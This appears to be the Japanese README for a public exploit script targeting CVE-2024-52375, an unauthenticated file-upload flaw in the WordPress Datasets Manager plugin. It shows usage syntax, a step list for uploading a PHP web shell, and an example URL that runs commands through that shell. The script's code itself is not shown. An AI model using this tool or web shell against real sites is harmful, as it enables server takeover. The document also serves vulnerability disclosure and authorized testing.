
WordPress Datasets Manager by Arttia Creative プラグイン <= 1.5 - 任意ファイルアップロードの脆弱性
💥 エクスプロイト作成者: Nxploit (Khaled Alenazi)
📅 CVE 公開日: 2024年11月14日
🧠 CVSS スコア: 10.0 (Critical)
🛠 CWE-434: 危険なタイプのファイルの無制限アップロード
Arttia Creative 製 Datasets Manager WordPress プラグインに、バージョン1.5以下のすべてのバージョンに影響する重大な脆弱性が発見されました。
このプラグインはアップロード処理中にファイルタイプを適切に検証しないため、認証されていない攻撃者が PHP シェルを含む任意のファイルをアップロードし、リモートコード実行 (RCE) を達成できる可能性があります。
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests ライブラリ:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
URL は対象の WordPress インストール先への完全なパスに置き換えてください。
成功した場合、スクリプトは次のことを行います:
_wpnonce を抽出します。nxploit.php という名前の PHP シェルをアップロードします。[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
次のようにコマンドを実行できます:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt を介してプラグインのバージョンを自動的に確認します。<= 1.5 のバージョンのみです。このツールは教育目的および許可を得たテスト目的のみで提供されています。
所有していないシステムやテスト許可のないシステムに対して使用することは違法です。